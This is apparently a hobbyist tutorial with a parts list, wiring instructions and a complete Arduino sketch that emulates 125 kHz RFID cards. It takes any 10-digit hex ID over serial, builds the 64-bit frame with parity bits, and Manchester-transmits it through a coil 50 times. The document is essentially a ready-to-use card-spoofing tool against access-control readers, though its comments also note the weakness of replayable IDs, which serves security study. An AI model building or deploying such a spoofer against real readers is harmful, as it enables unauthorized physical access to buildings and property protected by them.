125Khz RFID spoofing
Circuit schematics
List of materials:
- an antenna (there are many 125khz antennas on e-bay)
- Capacitor 1nF (this value may need to be tuned for the best resonance with the antenna)
- 4 diodes 1N4148
- Resistor 100Kohm
- zener diode 5.1v
Usage
Connect the two terminals of the circuit to GND and pin 12.
Compile and upload the code below.
Open a serial terminal (9600 bit/s), e.g.
screen /dev/ttyUSB0 9600
Type in 10 hexadecimal digits (characters are not echoed). The code computes all the parity bits, both the row (horizontal) and the column (vertical) ones.
Code
// Digital pin that drives the coil circuit; the page wires the circuit
// between GND and this pin.
#define coil_pin 12
// Characters received over serial, one per hex digit; filled by loop().
char data[10];
// Index of the next slot of data[] to fill; loop() resets it to 0 after the
// tenth character has been stored.
int data_count =0;
// One int per transmitted bit, 64 bits per frame. Only the first nine entries
// are initialised to 1 (the header); the remaining entries start at 0 and
// compute_data() fills in the data and parity bits.
int spoofed_card[64] = {1,1,1,1,1,1,1,1,1}; // header: nine consecutive 1 bits
void setup()
{
  // One-time initialisation: configure the coil pin as an output held low,
  // then open the serial port used to receive the hex digits.
  const long kSerialBaud = 9600;  // must match the terminal setting (9600 bit/s)

  pinMode(coil_pin, OUTPUT);
  digitalWrite(coil_pin, LOW);    // idle level until a frame is sent
  Serial.begin(kSerialBaud);
}
void loop()
{
  // Collects characters from the serial port into data[]; once the tenth
  // character (index 9) has been stored, the frame is built and transmitted
  // and the counter starts over.
  //
  // Note: every non-NUL byte is stored and counted, including CR/LF and other
  // non-hex characters. HexToDec() later maps anything that is not a hex
  // digit to 0, so no input is rejected here.
  if (!Serial.available()) {
    return;  // nothing received yet
  }

  char received = Serial.read();
  if (received == '\0') {
    return;  // NUL bytes are dropped without being counted
  }

  data[data_count] = received;

  if (data_count != 9) {
    data_count++;
    return;
  }

  // Tenth digit stored: transmit, then start collecting the next ID.
  spoofcard();
  data_count = 0;
}
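void compute_data(){
  // Builds bits 9..62 of spoofed_card[] from the ten hex characters in data[].
  //
  // Frame layout as produced here (index into spoofed_card[]):
  //    0..8   header, nine 1 bits (set by the array initialiser)
  //    9..58  ten rows of 5 bits: 4 data bits (most significant first)
  //           followed by 1 row parity bit
  //   59..62  four column parity bits, one per data-bit column
  //   63      never written here, so it keeps its initial value 0
  // Both parities are even: the parity bit is 1 when the bits it covers
  // contain an odd number of 1s. (The original comments called these "CRC";
  // they are plain parity bits.)
  //
  // Security note: the frame holds only 40 data bits plus parity. Nothing in
  // it is secret or tied to a challenge, so a reader that accepts this frame
  // alone is trusting a fixed identifier that can be replayed.
  //
  // Fix: the original row loop ran while bit < 59, i.e. twelve iterations.
  // The last two read data[10] and data[11] and the last one wrote
  // spoofed_card[64..67], all past the end of the arrays. Only ten rows exist,
  // so the loop is now bounded by the digit count. The 64 bits produced are
  // the same as before.
  const int kDigits = 10;        // hex characters per ID, one per row
  const int kFirstRowBit = 9;    // first bit after the header
  const int kRowStride = 5;      // 4 data bits + 1 parity bit
  const int kColumnParity = 59;  // first column parity bit

  // Data bits and row parity.
  for (int row = 0; row < kDigits; row++) {
    const int nibble = HexToDec(data[row]);
    const int base = kFirstRowBit + row * kRowStride;
    int ones = 0;
    for (int b = 0; b < 4; b++) {
      const int value = !!(nibble & (8 >> b));  // masks 8, 4, 2, 1
      spoofed_card[base + b] = value;
      ones += value;
    }
    spoofed_card[base + 4] = ((ones % 2) != 0);
  }

  // Column parity over the same data-bit position of all ten rows.
  for (int col = 0; col < 4; col++) {
    int ones = 0;
    for (int row = 0; row < kDigits; row++) {
      if (spoofed_card[kFirstRowBit + row * kRowStride + col]) ones++;
    }
    spoofed_card[kColumnParity + col] = ((ones % 2) != 0);
  }
}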
void spoofcard(){
  // Builds the frame from the digits currently in data[] and then sends it
  // 50 times back to back.
  compute_data();

  int remaining = 50;
  while (remaining-- > 0) {
    spoofnow();
  }
}
void send_manchester(int clock_half, int signal)
{
  // Drives the coil pin for one half of a Manchester-coded bit.
  //   clock_half: 0 for the first half of the bit period, 1 for the second
  //   signal:     the bit value being sent (0 or 1)
  // The pin goes LOW when clock_half XOR signal equals 1 and HIGH otherwise,
  // so a 1 bit is LOW then HIGH and a 0 bit is HIGH then LOW.
  const bool drive_low = ((clock_half ^ signal) == 1);
  digitalWrite(coil_pin, drive_low ? LOW : HIGH);
}
void spoofnow(){
  // Sends the 64 bits of spoofed_card[] once, in index order. Each bit is two
  // 256 microsecond halves, i.e. 512 microseconds per bit.
  const unsigned int kHalfBitMicros = 256;

  for (int idx = 0; idx != 64; ++idx) {
    send_manchester(0, spoofed_card[idx]);  // first half of the bit period
    delayMicroseconds(kHalfBitMicros);
    send_manchester(1, spoofed_card[idx]);  // second half of the bit period
    delayMicroseconds(kHalfBitMicros);
  }
}
int HexToDec(char hexa)
{
  // Converts one ASCII hex digit ('0'-'9', 'A'-'F', 'a'-'f') to its value
  // 0..15. Any other character yields 0, so an invalid character cannot be
  // told apart from the digit '0' by the caller.
  if ('0' <= hexa && hexa <= '9') {
    return hexa - '0';
  }
  if ('A' <= hexa && hexa <= 'F') {
    return 10 + (hexa - 'A');
  }
  if ('a' <= hexa && hexa <= 'f') {
    return 10 + (hexa - 'a');
  }
  return 0;
}